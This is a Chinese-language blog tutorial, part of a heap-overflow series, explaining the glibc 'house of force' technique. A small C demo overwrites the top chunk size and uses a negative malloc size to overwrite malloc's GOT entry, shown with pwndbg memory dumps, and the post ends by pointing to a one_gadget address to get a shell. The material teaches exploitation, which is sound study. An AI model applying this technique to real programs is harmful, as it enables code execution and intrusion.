当前位置:

二进制安全之堆溢出(系列)——house of force

知了姐2019-08-09895
摘要
本文为二进制安全之堆溢出(系列)第二期,主要介绍house of force。

原理

·      

源于论文:The malloc maleficarum

·      

·      

利用条件

·      

能够以溢出的方式控制到top chunksize

能够自由地控制堆分配尺寸的大小

可以构造size拿到top chunk本身之外的内存,如libc的内存空间

Demo 

#include<stdio.h> #include<malloc.h> #include<unistd.h> #include<string.h> int main(){     long *p = malloc(0x10);     sleep(0);     *(p+0x3) = -1;     sleep(0);     malloc(-4120);     sleep;     void *q = malloc(0x10);     strcpy(q,"aaaaaaaa");     malloc(0);     sleep(0);     return 0; }

调试

·      

初始堆块

·       

pwndbg> heap 0x602000 FASTBIN { prev_size = 0,  size = 33,  fd = 0x0,                       -->p指针指向fd bk = 0x0,  fd_nextsize = 0x0,  bk_nextsize = 0x20fe1 } 0x602020 PREV_INUSE { prev_size = 0,  size = 135137,  fd = 0x0,  bk = 0x0,  fd_nextsize = 0x0,  bk_nextsize = 0x0 } 
pwndbg> x/20gz 0x602000 0x602000:   0x0000000000000000  0x0000000000000021 0x602010:   0x0000000000000000  0x0000000000000000 0x602020:   0x0000000000000000  0x0000000000020fe1 0x602030:   0x0000000000000000  0x0000000000000000

从内存布局可以看到(p+0x3)指向top chunksize

·      

修改top chunksize位后

·       

pwndbg> x/20gz 0x602000 0x602000:   0x0000000000000000  0x0000000000000021 0x602010:   0x0000000000000000  0x0000000000000000 0x602020:   0x0000000000000000  0xffffffffffffffff

·      

malloc(-4120)之后

·       

0x602000 FASTBIN { prev_size = 0,  size = 33,  fd = 0x0,  bk = 0x0,  fd_nextsize = 0x0,  bk_nextsize = 0xffffffffffffeff1 } 0x602020 PREV_INUSE { prev_size = 0,  size = 18446744073709547505,    -->malloc(-4120) fd = 0x0,  bk = 0x0,  fd_nextsize = 0x0,  bk_nextsize = 0x0 } 0x601010 PREV_INUSE {                                       //可以看到现在的堆块已经到libcgot表了 prev_size = 140737351970320,  size = 4105,  bk = 0x7ffff7ad9230 <__GI___libc_malloc>, //  got_malloc的地址 fd_nextsize = 0x0 <__sleep>,                         //  got_sleep的地址 bk_nextsize = 0x0 }

malloc(-4120)的原因:当堆可分配的内存分配完之后就会到顶层的bss段,这里也不一定是-4120

·      

再次申请内存 q

·       

0x601010 FASTBIN { prev_size = 140737351970320,  size = 33,  fd = 0x7ffff7a91130 <__GI___libc_malloc>,  bk = 0x7ffff7ad9230 <__sleep>,  fd_nextsize = 0x0,  bk_nextsize = 0xfe9 }

相当于把got表所在的内存空间malloc下来了

·      

q 中写入aaaaaaaa

·       

0x601010 FASTBIN { prev_size = 140737351970320,  size = 33,  fd = 0x6161616161616161,    //aaaaaaaa bk = 0x7ffff7ad9200 <alarm>,  fd_nextsize = 0x0,  bk_nextsize = 0xfe9 }

·      

再次malloc(0)

·      

报错

因为上面写入的aaaaaaaa已经把malloc_got的内容修改为了aaaaaaaa

这里我么可以写入onegadget的地址,就能getshell


上一篇

面试干货|轻松搞定面试中的this问题

下一篇

二进制安全之堆溢出(系列)——堆基础 & 结构(一)

大家都在看

最新资讯:

鸿蒙开发培训多少钱?投资未来,价值无限

鸿蒙应用开发要学什么?解锁鸿蒙北向,打造跨平台应用

鸿蒙开发前景分析:揭秘鸿蒙北向的无限可能

学鸿蒙,选择南向还是北向?深入解析鸿蒙北向的魅力!

知了汇智项目总监探讨鸿蒙生态与人才培育新机遇

知了汇智引领产教融合新篇章:成都纺织高专与西南石油大学学子共赴国际商贸城研学之旅

知了汇智与西昌学院信息技术学院深入交流,探索校企合作新模式

鸿蒙生态新机遇,知了汇智在重软学院研讨会发表前沿见解

女生学计算机可以从事什么职业?网络安全行业等你来挑战!

探秘人工智能AIGC,汇智知了堂19.9元课程助你掌握未来技能!

  • 培训费用

  • 上课方式

  • 开班时间

  • 就业情况